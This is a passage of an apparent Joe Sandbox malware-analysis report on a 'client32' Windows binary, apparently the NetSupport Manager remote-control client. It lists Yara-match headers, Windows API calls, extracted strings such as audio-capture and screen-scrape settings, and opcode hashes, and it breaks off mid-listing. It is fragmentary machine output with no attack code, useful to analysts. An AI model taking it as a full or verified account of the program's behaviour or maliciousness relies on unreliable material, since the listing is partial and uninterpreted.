                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken$Authority$_free_malloc$AccountCountErrorIdentifierLastLookup
                                                        • String ID: advapi
                                                        • API String ID: 2675550055-46682764
                                                        • Opcode ID: 8a6bad04d055ccb3fe64c309022b91352f399925ddcc069f7f55c1038f8a2839
                                                        • Instruction ID: e41896da37f67aad26cc8bb122dbe4d69e903b7b164305b4c007e48cc011dbc7
                                                        • Opcode Fuzzy Hash: 8a6bad04d055ccb3fe64c309022b91352f399925ddcc069f7f55c1038f8a2839
                                                        • Instruction Fuzzy Hash: F4813171D042299BEB11CF55CC88BDEB7F8AF49308F5041E9E949A7241E770AE94CFA1
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • _malloc.LIBCMT ref: 1100B366
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                          • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,82E0FB89,?,00000000,00000000), ref: 1100AC84
                                                          • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                          • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACF7
                                                          • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD37
                                                          • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3E
                                                          • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                          • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                          • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                        • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,82E0FB89,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                        • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                        • _calloc.LIBCMT ref: 1100B3E9
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                        • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                        • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                        Strings
                                                        • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                        • DisableSounds, xrefs: 1100B342
                                                        • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                        • Audio, xrefs: 1100B347
                                                        • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                        • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                        • InitCaptureSounds NT6, xrefs: 1100B48E
                                                        • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                        • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                        • API String ID: 1843377891-2362500394
                                                        • Opcode ID: 84f6a34c3f9a23e85a815e55c0cb6dc8feb7e1515be3af9a6d3caf5416032c27
                                                        • Instruction ID: f6a869108093e80182554cf0a38d57943248311c262823834013d1bf8f3ce35d
                                                        • Opcode Fuzzy Hash: 84f6a34c3f9a23e85a815e55c0cb6dc8feb7e1515be3af9a6d3caf5416032c27
                                                        • Instruction Fuzzy Hash: 9151F7B5E04A46AFE704CF64DC80B9EFBA8FB45359F10467AE91993240EB31B550CBA1
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 1112D7BA
                                                        • GetDC.USER32(?), ref: 1112D7EC
                                                        • SelectObject.GDI32(00000000,?), ref: 1112D7FC
                                                        • GetTextExtentPoint32A.GDI32(00000000,?,00000000,00000002), ref: 1112D8A0
                                                        • SelectObject.GDI32(00000000,000003E8), ref: 1112D9A5
                                                        • ReleaseDC.USER32(?,00000000), ref: 1112D9CD
                                                        • SystemParametersInfoA.USER32(00000030,00000000,11182200,00000000), ref: 1112D9DD
                                                        • SetWindowPos.USER32(00000000,000000FF,-0000000F,-0000000F,-0000000A,-00000009,00000040,?,?,?,000003E8,00000002,TCP Retries), ref: 1112DA2F
                                                        • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 1112D906
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 1112DA67
                                                        Similarity
                                                        • API ID: ExtentObjectPoint32SelectTextWindow$ErrorExitInfoLastMessageParametersProcessReleaseSystemTimerVisiblewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1475044039-3129562787
                                                        • Opcode ID: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
                                                        • Instruction ID: 594014a1ddc5c7ee27caa9ffbdf23d2d6d19d72861e267c9d0e0215120db3a2f
                                                        • Opcode Fuzzy Hash: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
                                                        • Instruction Fuzzy Hash: EEA17AB9A00606AFCB15CF65D984E9EF7F1BF48314FA08568E959A7781E730B940CF60
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110F964E
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F9657
                                                        • GetTickCount.KERNEL32 ref: 110F965D
                                                        • GetTickCount.KERNEL32 ref: 110F96B0
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96B9
                                                        • GetTickCount.KERNEL32 ref: 110F96EA
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96F3
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F971C
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4,00000000,?,00000000), ref: 110F97E3
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 110E5C50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,110F9787,?), ref: 110E5C7B
                                                        Similarity
                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                        • API String ID: 1574099134-2778890452
                                                        • Opcode ID: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
                                                        • Instruction ID: b4577e42a59a3743beb29bf4ff123ba11c5e9efe7befee2d7f5d2ccaaf1aa78d
                                                        • Opcode Fuzzy Hash: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
                                                        • Instruction Fuzzy Hash: A241D676E013266FDB00DFA5ED85ADEFBA4BB5565CF004535F916E7200F6306904CBA2
                                                        APIs
                                                        • _memset.LIBCMT ref: 11045836
                                                        • WinExec.KERNEL32(?,00000001), ref: 110458AF
                                                        • CloseHandle.KERNEL32(?), ref: 110458D1
                                                        • CloseHandle.KERNEL32(?), ref: 110458DA
                                                        • IsWindow.USER32(00000000), ref: 110458EC
                                                        • GetLastError.KERNEL32 ref: 11045917
                                                        • IsWindow.USER32(00000000), ref: 11045949
                                                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104595A
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        Similarity
                                                        • API ID: CloseFolderHandlePathWindow$ErrorExecFileLastMessageModuleNamePost_memset
                                                        • String ID: D$DoShowVideo - could not find %s window$Failed to load player (%d)$PCIVideoSlave32$ShowVideo$pcivideovi.exe /X
                                                        • API String ID: 2703108677-1914331637
                                                        • Opcode ID: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
                                                        • Instruction ID: e696fddc6ff2d01e6b9a77bd21ef717381eee885786c7b130f534b4739ca8f54
                                                        • Opcode Fuzzy Hash: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
                                                        • Instruction Fuzzy Hash: AA410579A002199FDB10DF64DC85FDDF7A8AF45708F5080E4E9099B284EF71AA448F95
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,82E0FB89), ref: 1102F5FA
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • EnumWindows.USER32(Function_0002E710,00000001), ref: 1102F6D2
                                                        • EnumWindows.USER32(Function_0002E710,00000000), ref: 1102F72C
                                                        • Sleep.KERNEL32(00000014), ref: 1102F73C
                                                        • Sleep.KERNEL32(?), ref: 1102F773
                                                          • Part of subcall function 11026B80: _memset.LIBCMT ref: 11026BB5
                                                          • Part of subcall function 11026B80: wsprintfA.USER32 ref: 11026BEA
                                                          • Part of subcall function 11026B80: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11026C2F
                                                          • Part of subcall function 11026B80: GetExitCodeProcess.KERNEL32(?,?), ref: 11026C43
                                                          • Part of subcall function 11026B80: CloseHandle.KERNEL32(?,?), ref: 11026C75
                                                          • Part of subcall function 11026B80: CloseHandle.KERNEL32(?), ref: 11026C7E
                                                        • Sleep.KERNEL32(0000000A), ref: 1102F78B
                                                        • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 1102F847
                                                        Similarity
                                                        • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                        • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                        • API String ID: 3887438110-1852639040
                                                        • Opcode ID: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
                                                        • Instruction ID: fccb9083fa6e288bb695f73796274cd7590cfa02bb95d1b93bba247e7dcc7a00
                                                        • Opcode Fuzzy Hash: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
                                                        • Instruction Fuzzy Hash: 1791AC75E0022A9FDB54CF64CC80BEEF7A5AF49358F5441ADD9099B240EB70AE41CB92
                                                        APIs
                                                        Similarity
                                                        • API ID: CountTick_malloc_memsetwsprintf
                                                        • String ID: %s|%s$Channel$Client$Delay$NameLookup$_License$serial_no
                                                        • API String ID: 476529905-1572471466
                                                        • Opcode ID: ca7fc97896567c1f978747fa00b1f5c0e314cc63e1af649f67b0fbb7e76947d2
                                                        • Instruction ID: 20ddcee4d1bc7712217354b168d0bfd2dc4cde43965b802a14daddc5ad8be1dc
                                                        • Opcode Fuzzy Hash: ca7fc97896567c1f978747fa00b1f5c0e314cc63e1af649f67b0fbb7e76947d2
                                                        • Instruction Fuzzy Hash: 2C8148B5E002564FDB10CB78CC88BEEBBF5AF45318F1482E9D859D7281EA31E941CB91
                                                        APIs
                                                          • Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                          • Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • GetLocalTime.KERNEL32(?), ref: 110996E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                        • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 2014016395-1608741677
                                                        • Opcode ID: 6ca9aad45367f76a0944e11dc61ab406c9dd12e77d36c841446f91c23c45e7e4
                                                        • Instruction ID: addf530891e37868822e31691bf17d6718b8effada6f07c03448ee7c6713f98b
                                                        • Opcode Fuzzy Hash: 6ca9aad45367f76a0944e11dc61ab406c9dd12e77d36c841446f91c23c45e7e4
                                                        • Instruction Fuzzy Hash: C0B1AA79E0051AABDB25DB65CD50FEEF7B4AF58B08F4040D8E80963281EB317B44CEA5
                                                        APIs
                                                        • _calloc.LIBCMT ref: 11109194
                                                        • _free.LIBCMT ref: 11109178
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Cursors,00000000,0002001F,?,00000000,?,?), ref: 111091D7
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 11109315
                                                        • _free.LIBCMT ref: 11109323
                                                        • SystemParametersInfoA.USER32(00000057,00000000,00000000,00000000), ref: 1110933F
                                                        • _malloc.LIBCMT ref: 1110937C
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,?,11182200,00000001), ref: 111093B8
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,?,?,?,?,?), ref: 111093F2
                                                        • _free.LIBCMT ref: 11109403
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$HeapValue$AllocateCloseErrorFreeInfoLastOpenParametersSystem_calloc_malloc
                                                        • String ID: .ani$Control Panel\Cursors
                                                        • API String ID: 918258518-1319880064
                                                        • Opcode ID: c53165d656da7e753d8bb01dd9a1daddcdb0dc00f19b4d214db7b3aa82dc0232
                                                        • Instruction ID: 70085561973be509b33fca5fb73cb0cd02be037bb32c9e1d27dc1538c435e597
                                                        • Opcode Fuzzy Hash: c53165d656da7e753d8bb01dd9a1daddcdb0dc00f19b4d214db7b3aa82dc0232
                                                        • Instruction Fuzzy Hash: 0F8192B1E0026D9FDB25CF24CD95BD9F7B5AB09308F1045E9E90DAB280E7709A84CF91
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • EnterCriticalSection.KERNEL32(000000FF,View,limitcolorbits,00000000,00000000,82E0FB89,?,?,00000000), ref: 110AB17D
                                                        • UnionRect.USER32(?,?,?), ref: 110AB210
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110AB36E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                        • String ID: $$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$limitcolorbits
                                                        • API String ID: 3518726166-1273412197
                                                        • Opcode ID: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
                                                        • Instruction ID: a8670cac8e9aec6debf5f4417f5d7e546ceba16e81d257d7b5c14f0770091148
                                                        • Opcode Fuzzy Hash: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
                                                        • Instruction Fuzzy Hash: 08812774E016199FDB44CFA9D980BEDFBF5BB48304F10856AE915AB380DB30A941CF94
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000472), ref: 1103D64F
                                                          • Part of subcall function 1114E020: SetPropA.USER32(00000000,00000000,00000000), ref: 1114E03E
                                                          • Part of subcall function 1114E020: SetWindowLongA.USER32(00000000,000000FC,1114DA30), ref: 1114E04F
                                                        • wsprintfA.USER32 ref: 1103D6C9
                                                        • GetSystemMenu.USER32(?,00000000), ref: 1103D6EE
                                                        • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103D6FC
                                                        • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103D740
                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103D76F
                                                        • MessageBeep.USER32(00000000), ref: 1103D773
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$FolderItemMenuPath$BeepEnableFileLongMessageModuleNamePropSystemwsprintf
                                                        • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2765991881-2812993818
                                                        • Opcode ID: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
                                                        • Instruction ID: 894e21e3321225be45fbf4b84cce46d9dcc057afdefe44a7cc44894c2f8d1d99
                                                        • Opcode Fuzzy Hash: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
                                                        • Instruction Fuzzy Hash: 7241A275B40715AFD321DBA4CC86FCAF3A5AB48B08F108559F65A6B2C1DAB0B980CF54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: @$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister
                                                        • API String ID: 2102423945-4086722448
                                                        • Opcode ID: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
                                                        • Instruction ID: 1d57743a9d44351fe37c7a7ceb1e13dab01037a573cd7346b174f6f956a17580
                                                        • Opcode Fuzzy Hash: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
                                                        • Instruction Fuzzy Hash: 2EE19D759106169FDBA1DF64CC84BDEB7B8AF85308F0085ADE51E97281EB70AE84CF50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                        • API String ID: 2111968516-2092292787
                                                        • Opcode ID: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
                                                        • Instruction ID: d579ba34fa4a490cdb183746ff6a6ffdefa25787e89df8885af00e6879baa994
                                                        • Opcode Fuzzy Hash: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
                                                        • Instruction Fuzzy Hash: 4AF06C32AA821857AD0086EDB44443CF38C678066D7CCD1D2F58CEAF21E912CDA0AA99
                                                        APIs
                                                        • EnableWindow.USER32(00000000,?), ref: 1101D10E
                                                        • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1101D148
                                                        • DeleteObject.GDI32(?), ref: 1101D193
